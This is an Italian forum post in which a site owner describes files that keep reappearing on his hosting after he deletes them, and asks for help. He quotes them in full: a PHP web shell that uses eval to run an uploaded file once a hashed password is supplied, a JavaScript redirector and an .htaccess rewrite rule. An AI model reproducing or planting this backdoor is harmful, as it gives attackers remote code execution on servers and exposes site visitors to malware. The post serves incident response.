Sull'hosting di un sito che gestisco trovo spesso dei file che non ho mai messo... li cancello e dopo un po riappaiono.
viene creata una directory ilub che contiene dei file:
t.htm all'interno de quale c'è questo codice e0fa4c4356551c94d48ba476187f08e7 .
blog.htm : una pagina HTML di un bog
check.js : che l'antivirus riconosce come virus [TR/Redirector.E]
dummy.htm : un file apparentemente vuoto che contiene questo codice: <html><body><script>try { document.getElementById('hr').click() } catch(e) { location.href='blog.htm' }</script></body></html>
in un'altra directory h trovo 3 file:
- .htaccess con: RewriteEngine On RewriteRule ^.*$ jahohoq.txt [L]
- jahohoq.txt con: e0fa4c4356551c94d48ba476187f08e7
in un file c'era ancej questo:
<?
php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("testdata_$t"));
};
echo "<pre>";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code);
}else{
testdata('f');
};
}else{
testdata('pass');
};
testdata('end');
echo "</pre>";
?>
fa un eval cioè esegue un file che è in una directory temporanea. il file viene uploadato viene passato anche un parametro via POST che è "p" se p è uguale a aace99428c50dbe965acc93f3f275cd3 viene eseguito il codice.
Ho riscritto il codice che gestiva gli include dinamicamente in modo da evitare che venga eseguito codice da remoto ma nonostante tutti gli accorgimenti possibili questo BASTARDO riesce sempre ad entrare nel sito e inserire questi maledetti file che cercano di infettare i visitatori.
Qualcuno può darmi qualche aiuto?
in rete ho trovato queste discussioni in merito:
http://bbs.quickfox.net/msgs/msg.ssj...t&message=1133
http://www.prozone.it/smf/index.php?topic=2934.new
Rispondi quotando
